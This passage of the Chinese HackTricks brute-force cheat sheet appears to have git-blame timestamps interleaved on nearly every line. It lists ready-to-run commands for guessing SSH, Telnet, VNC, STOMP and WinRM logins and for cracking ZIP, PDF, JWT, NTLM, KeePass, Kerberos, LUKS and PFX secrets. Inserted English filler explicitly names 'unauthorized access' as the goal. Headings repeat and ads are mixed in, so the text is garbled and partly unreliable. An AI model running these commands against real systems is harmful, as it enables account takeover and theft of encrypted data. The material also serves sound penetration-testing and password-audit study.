2023-01-21 22:02:49 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] < IP > ssh
ncrack -p 22 --user root -P passwords.txt < IP > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < IP > -M ssh
patator ssh_login host=< ip > port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
2023-12-26 21:49:09 +00:00
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
2023-01-21 22:02:49 +00:00
```
2024-04-16 03:24:30 +00:00
#### 弱SSH密钥 / Debian可预测PRNG
2023-09-24 14:35:53 +00:00
2024-05-06 11:08:56 +00:00
一些系统在用于生成加密材料的随机种子中存在已知缺陷。这可能导致密钥空间大幅缩小,可以使用工具(如[snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute))对其进行暴力破解。也可以使用预生成的弱密钥集,例如[g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh)。
2023-01-21 22:02:49 +00:00
2024-04-16 03:24:30 +00:00
### STOMP( ActiveMQ、RabbitMQ、HornetQ和OpenMQ)
2023-12-26 21:49:09 +00:00
2024-02-07 05:49:16 +00:00
STOMP文本协议是一种广泛使用的消息传递协议, **允许与流行的消息队列服务( 如RabbitMQ、ActiveMQ、HornetQ和OpenMQ) 进行无缝通信和交互**。它提供了一种标准化和高效的方法来交换消息并执行各种消息操作。
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 21:49:09 +00:00
legba stomp --target localhost:61613 --username admin --password data/passwords.txt
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### Telnet
2024-04-06 18:13:07 +00:00
2024-05-06 11:08:56 +00:00
Telnet是一种用于远程登录的网络协议。
2020-07-15 15:43:14 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] < IP > telnet
ncrack -p 23 --user root -P passwords.txt < IP > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < IP > -M telnet
2023-12-26 21:49:09 +00:00
legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### VNC
2024-02-06 03:43:18 +00:00
2024-05-06 11:08:56 +00:00
### VNC
2020-07-15 15:43:14 +00:00
```bash
hydra -L /root/Desktop/user.txt – P /root/Desktop/pass.txt -s < PORT > < IP > vnc
2021-05-13 22:59:50 +00:00
medusa -h < IP > – u root -P /root/Desktop/pass.txt – M vnc
2020-07-15 15:43:14 +00:00
ncrack -V --user root -P /root/Desktop/pass.txt < IP > :>POR>T
2022-10-02 23:08:05 +00:00
patator vnc_login host=< IP > password=FILE0 0=/root/Desktop/pass.txt – t 1 – x retry:fgep!='Authentication failure' --max-retries 0 – x quit:code=0
use auxiliary/scanner/vnc/vnc_login
2024-04-16 03:24:30 +00:00
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt < IP >
2023-12-26 21:49:09 +00:00
legba vnc --target localhost:5901 --password data/passwords.txt
2022-01-10 10:36:14 +00:00
#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS < ip >
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
2020-07-15 15:43:14 +00:00
```
2024-04-16 03:24:30 +00:00
### Winrm
2020-09-20 21:41:33 +00:00
```bash
crackmapexec winrm < IP > -d < Domain Name > -u usernames.txt -p passwords.txt
```
2024-05-05 22:03:00 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-02-06 03:43:18 +00:00
\
2024-05-06 11:08:56 +00:00
使用 [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) 轻松构建和**自动化**由全球**最先进**社区工具驱动的工作流程。\
2024-02-06 03:43:18 +00:00
立即获取访问权限:
2024-05-06 11:08:56 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}
2024-02-06 03:43:18 +00:00
2024-04-16 03:24:30 +00:00
## 本地
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:30 +00:00
### 在线破解数据库
2020-07-15 15:43:14 +00:00
2024-05-06 11:08:56 +00:00
* [~~http://hashtoolkit.com/reverse-hash?~~ ](http://hashtoolkit.com/reverse-hash? ) (MD5 和 SHA1)
* [https://shuck.sh/get-shucking.php ](https://shuck.sh/get-shucking.php ) (MSCHAPv2/PPTP-VPN/NetNTLMv1, 带/不带ESS/SSP以及任何挑战值)
* [https://www.onlinehashcrack.com/ ](https://www.onlinehashcrack.com ) (哈希值, WPA2 捕获,以及 MSOffice、ZIP、PDF 的存档...)
* [https://crackstation.net/ ](https://crackstation.net ) (哈希值)
2024-02-06 03:43:18 +00:00
* [https://md5decrypt.net/ ](https://md5decrypt.net ) (MD5)
2024-05-06 11:08:56 +00:00
* [https://gpuhash.me/ ](https://gpuhash.me ) (哈希值和文件哈希值)
* [https://hashes.org/search.php ](https://hashes.org/search.php ) (哈希值)
* [https://www.cmd5.org/ ](https://www.cmd5.org ) (哈希值)
* [https://hashkiller.co.uk/Cracker ](https://hashkiller.co.uk/Cracker ) (MD5、NTLM、SHA1、MySQL5、SHA256、SHA512)
2024-02-06 03:43:18 +00:00
* [https://www.md5online.org/md5-decrypt.html ](https://www.md5online.org/md5-decrypt.html ) (MD5)
2021-11-24 15:00:38 +00:00
* [http://reverse-hash-lookup.online-domain-tools.com/ ](http://reverse-hash-lookup.online-domain-tools.com )
2020-07-15 15:43:14 +00:00
2024-05-06 11:08:56 +00:00
在尝试对哈希进行暴力破解之前,请查看这些内容。
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:30 +00:00
### ZIP
2020-07-15 15:43:14 +00:00
```bash
2023-08-03 19:12:22 +00:00
#sudo apt-get install fcrackzip
2020-07-15 15:43:14 +00:00
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
```
```bash
zip2john file.zip > zip.john
john zip.john
```
2021-02-21 10:41:35 +00:00
```bash
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
```
2024-04-16 03:24:30 +00:00
#### 已知明文 zip 攻击
2021-02-21 10:41:35 +00:00
2024-05-06 11:08:56 +00:00
您需要知道加密 zip 文件中包含的文件的**明文**(或部分明文)。您可以通过运行以下命令来检查加密 zip 中包含的文件的**文件名和文件大小**: **`7z l encrypted.zip`**\
2024-03-17 16:19:28 +00:00
从发布页面下载 [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0 )。
2022-06-08 21:20:05 +00:00
```bash
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C < encrypted.zip > -c < plaintext.file > -P < plaintext.zip > -p < plaintext.file >
2022-09-12 15:29:22 +00:00
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
2022-06-08 21:20:05 +00:00
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
2023-08-03 19:12:22 +00:00
./bkcrack -C < encrypted.zip > -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
2022-06-08 21:20:05 +00:00
unzip unlocked.zip #User new_pwd as password
```
2024-04-16 03:24:30 +00:00
### 7z
2024-02-06 03:43:18 +00:00
2024-04-16 03:24:30 +00:00
### 7z
2020-07-15 15:43:14 +00:00
```bash
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
```
```bash
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
```
2024-04-16 03:24:30 +00:00
### PDF
2024-01-10 06:29:36 +00:00
2024-05-06 11:08:56 +00:00
PDF( Portable Document Format) 是一种用于呈现文档的文件格式, 通常用于跨不同操作系统和设备共享文档。 PDF文件通常由文本、图像、表格和其他多媒体元素组成。
2020-07-15 15:43:14 +00:00
```bash
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
2022-09-12 15:29:22 +00:00
#pdf2john didn't work well, john didn't know which hash type was
2020-07-15 15:43:14 +00:00
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=< PASSWORD > --decrypt encrypted.pdf plaintext.pdf
```
2024-04-16 03:24:30 +00:00
### PDF Owner Password
2022-06-27 08:23:29 +00:00
2024-05-06 11:08:56 +00:00
要破解PDF所有者密码, 请查看此链接: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/ ](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/ )
2022-06-27 08:23:29 +00:00
2024-04-16 03:24:30 +00:00
### JWT
2020-07-15 15:43:14 +00:00
```bash
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
```
2024-04-16 03:24:30 +00:00
### NTLM破解
2020-07-15 15:43:14 +00:00
```bash
Format:USUARIO:ID:HASH_LM:HASH_NT:::
2021-10-05 14:53:03 +00:00
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
2020-07-15 15:43:14 +00:00
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
```
2024-05-06 11:08:56 +00:00
### Keepass
2024-04-16 03:24:30 +00:00
### Keepass
2020-07-15 15:43:14 +00:00
```bash
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
2022-09-12 15:29:22 +00:00
keepass2john -k < file-password > file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
2020-07-15 15:43:14 +00:00
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```
2024-04-16 03:24:30 +00:00
### Keberoasting
2024-04-06 18:13:07 +00:00
2024-05-06 11:08:56 +00:00
### Keberoasting
2020-07-15 15:43:14 +00:00
```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
2024-05-06 11:08:56 +00:00
### 破解LUKS加密
2020-07-15 15:43:14 +00:00
2024-05-06 11:08:56 +00:00
#### 方法1
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
安装:[https://github.com/glv2/bruteforce-luks](https://github.com/glv2/bruteforce-luks)
2020-07-15 15:43:14 +00:00
```bash
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
2024-04-16 03:24:30 +00:00
#### 方法 2
2020-07-15 15:43:14 +00:00
```bash
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
2020-12-23 13:35:45 +00:00
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
2020-07-15 15:43:14 +00:00
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
2024-05-05 22:03:00 +00:00
另一个Luks BF教程: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1)
2024-04-06 18:13:07 +00:00
2024-05-05 22:03:00 +00:00
### Mysql
2020-07-15 15:43:14 +00:00
```bash
#John hash format
< USERNAME > :$mysqlna$< CHALLENGE > *< RESPONSE >
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
```
2024-04-16 03:24:30 +00:00
### PGP/GPG私钥
2021-09-27 14:59:59 +00:00
```bash
2022-09-12 15:29:22 +00:00
gpg2john private_pgp.key #This will generate the hash and save it in a file
2021-09-27 14:59:59 +00:00
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
```
2024-04-16 03:24:30 +00:00
### Cisco
2024-04-06 18:13:07 +00:00
2024-05-05 22:03:00 +00:00
< figure > < img src = "../.gitbook/assets/image (663).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-09-30 10:43:59 +00:00
2024-04-16 03:24:30 +00:00
### DPAPI Master Key
2022-05-19 12:02:10 +00:00
2024-05-05 22:03:00 +00:00
使用 [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py ](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py ) 然后运行 john
2022-05-19 12:02:10 +00:00
2024-04-16 03:24:30 +00:00
### Open Office Pwd Protected Column
2022-02-07 10:56:05 +00:00
2024-05-06 11:08:56 +00:00
如果您有一个受密码保护的 xlsx 文件,其中包含一个受密码保护的列,您可以取消保护:
2022-02-07 10:56:05 +00:00
2024-05-06 11:08:56 +00:00
* **将其上传到 Google 云端硬盘**,密码将自动删除
* **手动**进行**删除**:
2022-02-07 10:56:05 +00:00
```bash
unzip file.xlsx
grep -R "sheetProtection" ./*
2022-04-05 22:24:52 +00:00
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
2022-02-07 10:56:05 +00:00
# Remove that line and rezip the file
zip -r file.xls .
```
2024-04-16 03:24:30 +00:00
### PFX 证书
2022-02-07 12:08:46 +00:00
```bash
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
2022-04-05 21:52:22 +00:00
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
2022-02-07 12:08:46 +00:00
```
2024-05-05 22:03:00 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2024-01-10 06:29:36 +00:00
\
2024-05-06 11:08:56 +00:00
使用 [**Trickest** ](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=brute-force ) 来轻松构建和**自动化工作流**,利用世界上**最先进**的社区工具。\
2024-01-10 06:29:36 +00:00
立即获取访问权限:
2024-05-06 11:08:56 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}
2024-01-10 06:29:36 +00:00
2024-04-16 03:24:30 +00:00
## 工具
2020-07-15 15:43:14 +00:00
2023-08-03 19:12:22 +00:00
**哈希示例:** [https://openwall.info/wiki/john/sample-hashes ](https://openwall.info/wiki/john/sample-hashes )
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:30 +00:00
### 哈希标识符
2020-07-15 15:43:14 +00:00
```bash
hash-identifier
> <HASH>
```
2024-04-16 03:24:30 +00:00
### 字典列表
2022-08-14 12:59:30 +00:00
* **Rockyou**
2022-09-23 17:52:05 +00:00
* [**Probable-Wordlists** ](https://github.com/berzerk0/Probable-Wordlists )
* [**Kaonashi** ](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists )
2024-02-06 03:43:18 +00:00
* [**Seclists - Passwords** ](https://github.com/danielmiessler/SecLists/tree/master/Passwords )
2022-08-14 12:59:30 +00:00
2024-04-16 03:24:30 +00:00
### **字典生成工具**
2022-08-14 12:59:30 +00:00
2024-02-06 03:43:18 +00:00
* [**kwprocessor** ](https://github.com/hashcat/kwprocessor )**:** 高级键盘漫步生成器,可配置基本字符、键位图和路径。
2022-08-14 12:59:30 +00:00
```bash
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
```
2024-04-16 03:24:30 +00:00
### John变异
2024-04-06 18:13:07 +00:00
2024-05-05 22:03:00 +00:00
阅读 _**/etc/john/john.conf**_ 并对其进行配置
2020-07-15 15:43:14 +00:00
```bash
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
```
2024-04-16 03:24:30 +00:00
### Hashcat
2020-07-15 15:43:14 +00:00
2024-05-05 22:03:00 +00:00
#### Hashcat攻击
2024-04-06 18:13:07 +00:00
2024-05-05 22:03:00 +00:00
* **字典攻击** (`-a 0`) 使用规则
2024-04-06 18:13:07 +00:00
2024-05-05 22:03:00 +00:00
**Hashcat** 已经带有一个**包含规则的文件夹**,但你也可以在[**这里找到其他有趣的规则**](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules)。
2022-08-14 12:59:30 +00:00
```
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
```
2024-04-16 03:24:30 +00:00
* **字典组合器** 攻击
2022-08-14 12:59:30 +00:00
2024-02-06 03:43:18 +00:00
可以使用 hashcat 将 2 个字典**合并为 1 个**。\
如果列表 1 包含单词 ** "hello"**,第二个包含两行单词 ** "world"** 和 ** "earth"**。将生成单词 `helloworld` 和 `helloearth` 。
2022-08-14 12:59:30 +00:00
```bash
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
2022-09-12 15:29:22 +00:00
# In the previous example this will generate:
2022-09-23 17:52:05 +00:00
## hello-world!
2022-08-14 12:59:30 +00:00
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
```
2023-08-03 19:12:22 +00:00
* **掩码攻击** (`-a 3`)
2022-08-14 12:59:30 +00:00
```bash
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:; < =>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
2022-09-12 15:29:22 +00:00
# Mask attack declaring custom charset
2022-08-14 12:59:30 +00:00
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
2022-09-23 17:52:05 +00:00
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
2022-08-14 12:59:30 +00:00
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
```
2024-02-06 03:43:18 +00:00
* 字典 + 掩码 (`-a 6`) / 掩码 + 字典 (`-a 7`) 攻击
2022-08-14 12:59:30 +00:00
```bash
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
```
2024-04-16 03:24:30 +00:00
#### Hashcat 模式
2020-07-15 15:43:14 +00:00
```bash
hashcat --example-hashes | grep -B1 -A2 "NTLM"
```
2024-05-05 22:03:00 +00:00
## Brute Forcing
2024-04-06 18:13:07 +00:00
2024-05-06 11:08:56 +00:00
Brute forcing is a common technique used to crack passwords by systematically trying all possible combinations of characters until the correct one is found. This method can be used to crack Linux hashes stored in the `/etc/shadow` file.
### Tools
There are various tools available for brute forcing passwords, such as John the Ripper, Hashcat, and Hydra. These tools can be used to automate the process of trying different password combinations until the correct one is discovered.
### Methodology
1. Obtain the hash from the `/etc/shadow` file.
2. Use a brute force tool to systematically try different password combinations.
3. Monitor the tool's progress and wait for the correct password to be found.
4. Once the password is cracked, it can be used to gain unauthorized access to the system.
### Resources
- [John the Ripper ](https://www.openwall.com/john/ )
- [Hashcat ](https://hashcat.net/hashcat/ )
- [Hydra ](https://github.com/vanhauser-thc/thc-hydra )
2021-11-24 15:00:38 +00:00
```
2023-08-03 19:12:22 +00:00
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
2020-07-15 15:43:14 +00:00
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
```
2024-05-06 11:08:56 +00:00
## Brute Forcing Windows Hashes
### Introduction
Brute forcing Windows hashes is a common technique used to crack passwords in Windows environments. This method involves trying all possible combinations of characters until the correct password is found.
### Tools
There are various tools available for brute forcing Windows hashes, such as **John the Ripper** and **Hashcat** . These tools can be used to automate the process of trying different password combinations quickly and efficiently.
### Methodology
2024-04-06 18:13:07 +00:00
2024-05-06 11:08:56 +00:00
1. Obtain the Windows hash that you want to crack.
2. Use a brute force tool like John the Ripper or Hashcat to start the password cracking process.
3. Configure the tool with the necessary parameters, such as character set, minimum and maximum password length, etc.
4. Start the brute force attack and wait for the tool to find the correct password.
5. Once the password is cracked, you can use it to gain unauthorized access to the Windows system.
2024-03-29 21:06:45 +00:00
2024-05-06 11:08:56 +00:00
### Conclusion
2024-04-06 18:13:07 +00:00
2024-05-06 11:08:56 +00:00
Brute forcing Windows hashes can be a time-consuming process, especially for complex passwords. However, with the right tools and techniques, it is possible to crack Windows passwords and gain access to sensitive information.
2021-11-24 15:00:38 +00:00
```
2020-07-15 15:43:14 +00:00
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems
```
2024-05-06 11:08:56 +00:00
破解常见应用程序哈希值
2021-11-24 15:00:38 +00:00
```
2023-08-03 19:12:22 +00:00
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
2020-07-15 15:43:14 +00:00
10800 | SHA-384 | Raw Hash
2023-08-03 19:12:22 +00:00
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash
2020-07-15 15:43:14 +00:00
```
2022-04-28 16:01:33 +00:00
< details >
2024-02-06 03:43:18 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS红队专家) < / strong > < / a > < strong > ! < / strong > < / summary >
2023-12-30 12:15:15 +00:00
2024-05-05 22:03:00 +00:00
支持HackTricks的其他方式:
2022-04-28 16:01:33 +00:00
2024-02-06 03:43:18 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
2024-05-05 22:03:00 +00:00
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
2024-05-06 11:08:56 +00:00
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**。**
2024-02-06 03:43:18 +00:00
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2022-04-28 16:01:33 +00:00
< / details >
2022-08-31 22:35:39 +00:00
2024-05-05 22:03:00 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-05-06 11:08:56 +00:00
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks& utm_medium=text& utm_campaign=ppc& utm_content=brute-force)轻松构建和**自动化工作流程**,利用世界上**最先进**的社区工具。\
2023-08-03 19:12:22 +00:00
立即获取访问权限:
2022-08-31 22:35:39 +00:00
2024-05-06 11:08:56 +00:00
{% embed url="https://trickest.com/?utm_source=hacktricks& utm_medium=banner& utm_campaign=ppc& utm_content=brute-force" %}